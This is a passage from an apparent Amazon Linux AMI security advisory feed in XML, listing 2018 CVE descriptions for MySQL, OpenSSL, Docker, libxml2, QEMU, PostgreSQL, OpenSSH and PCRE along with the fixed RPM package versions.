Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: MyISAM). Supported versions that are affected are 5.5.60 and prior, 5.6.40 and prior and 5.7.22 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N).
1602356:
CVE-2018-3058 mysql: MyISAM unspecified vulnerability (CPU Jul 2018)
CVE-2018-3056:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Privileges). Supported versions that are affected are 5.7.22 and prior and 8.0.11 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.0 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).
1602355:
CVE-2018-3056 mysql: Server: Security: Privileges unspecified vulnerability (CPU Jul 2018)
CVE-2018-3054:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.7.22 and prior and 8.0.11 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1602354:
CVE-2018-3054 mysql: Server: DDL unspecified vulnerability (CPU Jul 2018)
CVE-2018-2767:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Encryption). Supported versions that are affected are 5.5.60 and prior, 5.6.40 and prior and 5.7.22 and prior. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.0 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N).
1564965:
CVE-2018-2767 mysql: use of SSL/TLS not enforced in libmysqld (Return of BACKRONYM)
CVE-2018-0739:
Constructed ASN.1 types with a recursive definition (such as can be found in PKCS7) could eventually exceed the stack given malicious input with excessive recursion. This could result in a Denial Of Service attack. There are no such structures used within SSL/TLS that come from untrusted sources so this is considered safe. Fixed in OpenSSL 1.1.0h (Affected 1.1.0-1.1.0g). Fixed in OpenSSL 1.0.2o (Affected 1.0.2b-1.0.2n).
1561266:
CVE-2018-0739 openssl: Handling of crafted recursive ASN.1 structures can cause a stack overflow and resulting denial of service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0739" title="" id="CVE-2018-0739" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2767" title="" id="CVE-2018-2767" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3054" title="" id="CVE-2018-3054" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3056" title="" id="CVE-2018-3056" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3058" title="" id="CVE-2018-3058" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3060" title="" id="CVE-2018-3060" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3061" title="" id="CVE-2018-3061" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3062" title="" id="CVE-2018-3062" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3064" title="" id="CVE-2018-3064" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3065" title="" id="CVE-2018-3065" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3066" title="" id="CVE-2018-3066" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3070" title="" id="CVE-2018-3070" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3071" title="" id="CVE-2018-3071" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3077" title="" id="CVE-2018-3077" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3081" title="" id="CVE-2018-3081" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql57-server" version="5.7.23" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-server-5.7.23-2.8.amzn1.x86_64.rpm</filename></package><package name="mysql57-devel" version="5.7.23" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-devel-5.7.23-2.8.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded" version="5.7.23" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-5.7.23-2.8.amzn1.x86_64.rpm</filename></package><package name="mysql57" version="5.7.23" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-5.7.23-2.8.amzn1.x86_64.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.23" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-debuginfo-5.7.23-2.8.amzn1.x86_64.rpm</filename></package><package name="mysql57-errmsg" version="5.7.23" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-errmsg-5.7.23-2.8.amzn1.x86_64.rpm</filename></package><package name="mysql57-test" version="5.7.23" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-test-5.7.23-2.8.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.23" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-devel-5.7.23-2.8.amzn1.x86_64.rpm</filename></package><package name="mysql57-libs" version="5.7.23" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-libs-5.7.23-2.8.amzn1.x86_64.rpm</filename></package><package name="mysql57-common" version="5.7.23" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-common-5.7.23-2.8.amzn1.x86_64.rpm</filename></package><package name="mysql57" version="5.7.23" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-5.7.23-2.8.amzn1.i686.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.23" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-devel-5.7.23-2.8.amzn1.i686.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.23" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-debuginfo-5.7.23-2.8.amzn1.i686.rpm</filename></package><package name="mysql57-server" version="5.7.23" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-server-5.7.23-2.8.amzn1.i686.rpm</filename></package><package name="mysql57-common" version="5.7.23" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-common-5.7.23-2.8.amzn1.i686.rpm</filename></package><package name="mysql57-test" version="5.7.23" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-test-5.7.23-2.8.amzn1.i686.rpm</filename></package><package name="mysql57-errmsg" version="5.7.23" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-errmsg-5.7.23-2.8.amzn1.i686.rpm</filename></package><package name="mysql57-libs" version="5.7.23" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-libs-5.7.23-2.8.amzn1.i686.rpm</filename></package><package name="mysql57-embedded" version="5.7.23" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-5.7.23-2.8.amzn1.i686.rpm</filename></package><package name="mysql57-devel" version="5.7.23" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-devel-5.7.23-2.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1071</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1071: medium priority package update for docker</title><issued date="2018-09-05 19:30:00" /><updated date="2018-09-06 22:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-10892:
The default OCI Linux spec in oci/defaults{_linux}.go in Docker/Moby, from 1.11 to current, does not block /proc/acpi pathnames. The flaw allows an attacker to modify host&#039;s hardware like enabling/disabling Bluetooth or turning up/down keyboard brightness.
1598581:
CVE-2018-10892 docker: container breakout without selinux in enforcing mode
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10892" title="" id="CVE-2018-10892" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="docker" version="18.06.1ce" release="2.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-18.06.1ce-2.16.amzn1.x86_64.rpm</filename></package><package name="docker-debuginfo" version="18.06.1ce" release="2.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-debuginfo-18.06.1ce-2.16.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1072</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1072: medium priority package update for libxml2</title><issued date="2018-09-05 19:31:00" /><updated date="2018-09-06 22:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-14404:
A null pointer dereference vulnerability exists in the xpath.c:xmlXPathCompOpEval() function of libxml2 when parsing invalid XPath expression. Applications processing untrusted XSL format inputs with the use of libxml2 library may be vulnerable to denial of service attack due to crash of the application.
1595985:
CVE-2018-14404 libxml2: NULL pointer dereference in xpath.c:xmlXPathCompOpEval() can allow attackers to cause a denial of service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14404" title="" id="CVE-2018-14404" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libxml2-static" version="2.9.1" release="6.3.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-static-2.9.1-6.3.52.amzn1.x86_64.rpm</filename></package><package name="libxml2" version="2.9.1" release="6.3.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-2.9.1-6.3.52.amzn1.x86_64.rpm</filename></package><package name="libxml2-python27" version="2.9.1" release="6.3.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python27-2.9.1-6.3.52.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="6.3.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-debuginfo-2.9.1-6.3.52.amzn1.x86_64.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.3.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-devel-2.9.1-6.3.52.amzn1.x86_64.rpm</filename></package><package name="libxml2-python26" version="2.9.1" release="6.3.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python26-2.9.1-6.3.52.amzn1.x86_64.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.3.52.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-devel-2.9.1-6.3.52.amzn1.i686.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="6.3.52.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-static-2.9.1-6.3.52.amzn1.i686.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="6.3.52.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-debuginfo-2.9.1-6.3.52.amzn1.i686.rpm</filename></package><package name="libxml2" version="2.9.1" release="6.3.52.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-2.9.1-6.3.52.amzn1.i686.rpm</filename></package><package name="libxml2-python26" version="2.9.1" release="6.3.52.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python26-2.9.1-6.3.52.amzn1.i686.rpm</filename></package><package name="libxml2-python27" version="2.9.1" release="6.3.52.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python27-2.9.1-6.3.52.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1073</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1073: important priority package update for qemu-kvm</title><issued date="2018-09-05 19:33:00" /><updated date="2018-09-06 22:01:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-7550:
Quick Emulator (QEMU), compiled with the PC System Emulator with multiboot feature support, is vulnerable to an OOB r/w memory access issue. The issue could occur while loading a kernel image during the guest boot, if mh_load_end_addr address is greater than the mh_bss_end_addr address. A user or process could use this flaw to potentially achieve arbitrary code execution on a host.
1549798:
CVE-2018-7550 QEMU: i386: multiboot OOB access while loading kernel image
CVE-2018-11806:
A heap buffer overflow issue was found in the way SLiRP networking back-end in QEMU processes fragmented packets. It could occur while reassembling the fragmented datagrams of an incoming packet. A privileged user/process inside guest could use this flaw to crash the QEMU process resulting in DoS or potentially leverage it to execute arbitrary code on the host with privileges of the QEMU process.
1586245:
CVE-2018-11806 QEMU: slirp: heap buffer overflow while reassembling fragmented datagrams
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11806" title="" id="CVE-2018-11806" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7550" title="" id="CVE-2018-7550" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="qemu-kvm-common" version="1.5.3" release="156.15.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-common-1.5.3-156.15.amzn1.x86_64.rpm</filename></package><package name="qemu-img" version="1.5.3" release="156.15.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-img-1.5.3-156.15.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm" version="1.5.3" release="156.15.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-1.5.3-156.15.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-debuginfo" version="1.5.3" release="156.15.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-debuginfo-1.5.3-156.15.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-tools" version="1.5.3" release="156.15.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-tools-1.5.3-156.15.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1074</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1074: important priority package update for postgresql96</title><issued date="2018-09-05 20:39:00" /><updated date="2018-09-06 22:02:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-10925:
It was discovered that PostgreSQL failed to properly check authorization on certain statements involved with &quot;INSERT ... ON CONFLICT DO UPDATE&quot;. An attacker with &quot;CREATE TABLE&quot; privileges could exploit this to read arbitrary bytes server memory. If the attacker also had certain &quot;INSERT&quot; and limited &quot;UPDATE&quot; privileges to a particular table, they could exploit this to update other columns in the same table.
1612619:
CVE-2018-10925 postgresql: Missing authorization and memory disclosure in INSERT ... ON CONFLICT DO UPDATE statements
CVE-2018-10915:
A vulnerability was found in libpq, the default PostgreSQL client library where libpq failed to properly reset its internal state between connections. If an affected version of libpq were used with &quot;host&quot; or &quot;hostaddr&quot; connection parameters from untrusted input, attackers could bypass client-side connection security features, obtain access to higher privileged connections or potentially cause other impact through SQL injection, by causing the PQescape() functions to malfunction.
1609891:
CVE-2018-10915 postgresql: Certain host connection parameters defeat client-side security defenses
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10915" title="" id="CVE-2018-10915" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10925" title="" id="CVE-2018-10925" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql96-plpython26" version="9.6.10" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plpython26-9.6.10-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql96-docs" version="9.6.10" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-docs-9.6.10-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql96" version="9.6.10" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-9.6.10-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plperl" version="9.6.10" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plperl-9.6.10-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.10" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-debuginfo-9.6.10-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql96-test" version="9.6.10" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-test-9.6.10-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql96-devel" version="9.6.10" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-devel-9.6.10-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plpython27" version="9.6.10" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plpython27-9.6.10-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql96-libs" version="9.6.10" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-libs-9.6.10-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql96-contrib" version="9.6.10" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-contrib-9.6.10-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql96-static" version="9.6.10" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-static-9.6.10-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql96-server" version="9.6.10" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-server-9.6.10-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plperl" version="9.6.10" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plperl-9.6.10-1.81.amzn1.i686.rpm</filename></package><package name="postgresql96-devel" version="9.6.10" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-devel-9.6.10-1.81.amzn1.i686.rpm</filename></package><package name="postgresql96-server" version="9.6.10" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-server-9.6.10-1.81.amzn1.i686.rpm</filename></package><package name="postgresql96-plpython26" version="9.6.10" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython26-9.6.10-1.81.amzn1.i686.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.10" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-debuginfo-9.6.10-1.81.amzn1.i686.rpm</filename></package><package name="postgresql96-test" version="9.6.10" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-test-9.6.10-1.81.amzn1.i686.rpm</filename></package><package name="postgresql96-plpython27" version="9.6.10" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython27-9.6.10-1.81.amzn1.i686.rpm</filename></package><package name="postgresql96-contrib" version="9.6.10" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-contrib-9.6.10-1.81.amzn1.i686.rpm</filename></package><package name="postgresql96" version="9.6.10" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-9.6.10-1.81.amzn1.i686.rpm</filename></package><package name="postgresql96-static" version="9.6.10" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-static-9.6.10-1.81.amzn1.i686.rpm</filename></package><package name="postgresql96-docs" version="9.6.10" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-docs-9.6.10-1.81.amzn1.i686.rpm</filename></package><package name="postgresql96-libs" version="9.6.10" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-libs-9.6.10-1.81.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1075</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1075: low priority package update for openssh</title><issued date="2018-09-05 20:41:00" /><updated date="2018-09-06 22:02:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-15473:
OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.
1619063:
CVE-2018-15473 openssh: User enumeration via malformed packets in authentication requests
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15473" title="" id="CVE-2018-15473" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssh-keycat" version="7.4p1" release="16.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-keycat-7.4p1-16.71.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="7.4p1" release="16.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-7.4p1-16.71.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="7.4p1" release="16.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-7.4p1-16.71.amzn1.x86_64.rpm</filename></package><package name="openssh-cavs" version="7.4p1" release="16.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-cavs-7.4p1-16.71.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="7.4p1" release="16.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-7.4p1-16.71.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="7.4p1" release="16.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-7.4p1-16.71.amzn1.x86_64.rpm</filename></package><package name="openssh" version="7.4p1" release="16.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-7.4p1-16.71.amzn1.x86_64.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.10.3" release="2.16.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.10.3-2.16.71.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="7.4p1" release="16.71.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-server-7.4p1-16.71.amzn1.i686.rpm</filename></package><package name="openssh-clients" version="7.4p1" release="16.71.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-7.4p1-16.71.amzn1.i686.rpm</filename></package><package name="openssh-keycat" version="7.4p1" release="16.71.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-keycat-7.4p1-16.71.amzn1.i686.rpm</filename></package><package name="openssh-cavs" version="7.4p1" release="16.71.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-cavs-7.4p1-16.71.amzn1.i686.rpm</filename></package><package name="openssh" version="7.4p1" release="16.71.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-7.4p1-16.71.amzn1.i686.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.10.3" release="2.16.71.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.10.3-2.16.71.amzn1.i686.rpm</filename></package><package name="openssh-ldap" version="7.4p1" release="16.71.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-7.4p1-16.71.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="7.4p1" release="16.71.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-7.4p1-16.71.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1076</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1076: important priority package update for pcre</title><issued date="2018-09-05 20:42:00" /><updated date="2023-10-25 21:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-3191:
The compile_branch function in pcre_compile.c in PCRE 8.x before 8.39 and pcre2_compile.c in PCRE2 before 10.22 mishandles patterns containing an (*ACCEPT) substring in conjunction with nested parentheses, which allows remote attackers to execute arbitrary code or cause a denial of service (stack-based buffer overflow) via a crafted regular expression, as demonstrated by a JavaScript RegExp object encountered by Konqueror, aka ZDI-CAN-3542.
CVE-2015-8391:
The pcre_compile function in pcre_compile.c in PCRE before 8.38 mishandles certain [: nesting, which allows remote attackers to cause a denial of service (CPU consumption) or possibly have unspecified other impact via a crafted regular expression, as demonstrated by a JavaScript RegExp object encountered by Konqueror.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8391" title="" id="CVE-2015-8391" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3191" title="" id="CVE-2016-3191" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="pcre" version="8.21" release="7.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/pcre-8.21-7.8.amzn1.x86_64.rpm</filename></package><package name="pcre-tools" version="8.21" release="7.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/pcre-tools-8.21-7.8.amzn1.x86_64.rpm</filename></package><package name="pcre-debuginfo" version="8.21" release="7.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/pcre-debuginfo-8.21-7.8.amzn1.x86_64.rpm</filename></package><package name="pcre-devel" version="8.21" release="7.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/pcre-devel-8.21-7.8.amzn1.x86_64.rpm</filename></package><package name="pcre-static" version="8.21" release="7.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/pcre-static-8.21-7.8.amzn1.x86_64.rpm</filename></package><package name="pcre-static" version="8.21" release="7.8.amzn1" epoch="0" arch="i686"><filename>Packages/pcre-static-8.21-7.8.amzn1.i686.rpm</filename></package><package name="pcre-debuginfo" version="8.21" release="7.8.amzn1" epoch="0" arch="i686"><filename>Packages/pcre-debuginfo-8.21-7.8.amzn1.i686.rpm</filename></package><package name="pcre-tools" version="8.21" release="7.8.amzn1" epoch="0" arch="i686"><filename>Packages/pcre-tools-8.21-7.8.amzn1.i686.rpm</filename></package><package name="pcre-devel" version="8.21" release="7.8.amzn1" epoch="0" arch="i686"><filename>Packages/pcre-devel-8.21-7.8.amzn1.i686.rpm</filename></package><package name="pcre" version="8.21" release="7.8.amzn1" epoch="0" arch="i686"><filename>Packages/pcre-8.21-7.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1079</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1079: important priority package update for postgresql93 postgresql94 postgresql95</title><issued date="2018-09-19 17:04:00" /><updated date="2018-09-19 23:31:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-10925:
It was discovered that PostgreSQL failed to properly check authorization on certain statements involved with &quot;INSERT ... ON CONFLICT DO UPDATE&quot;. An attacker with &quot;CREATE TABLE&quot; privileges could exploit this to read arbitrary bytes server memory. If the attacker also had certain &quot;INSERT&quot; and limited &quot;UPDATE&quot; privileges to a particular table, they could exploit this to update other columns in the same table.
1612619:
CVE-2018-10925 postgresql: Missing authorization and memory disclosure in INSERT ... ON CONFLICT DO UPDATE statements
CVE-2018-10915:
A vulnerability was found in libpq, the default PostgreSQL client library where libpq failed to properly reset its internal state between connections. If an affected version of libpq were used with &quot;host&quot; or &quot;hostaddr&quot; connection parameters from untrusted input, attackers could bypass client-side connection security features, obtain access to higher privileged connections or potentially cause other impact through SQL injection, by causing the PQescape() functions to malfunction.
1609891:
CVE-2018-10915 postgresql: Certain host connection parameters defeat client-side security defenses
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10915" title="" id="CVE-2018-10915" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10925" title="" id="CVE-2018-10925" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql94-plpython26" version="9.4.19" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython26-9.4.19-1.75.amzn1.x86_64.rpm</filename></package><package name="postgresql94-contrib" version="9.4.19" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-contrib-9.4.19-1.75.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.19" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython27-9.4.19-1.75.amzn1.x86_64.rpm</filename></package><package name="postgresql94-libs" version="9.4.19" release="1.75.amzn1" epoch="0" 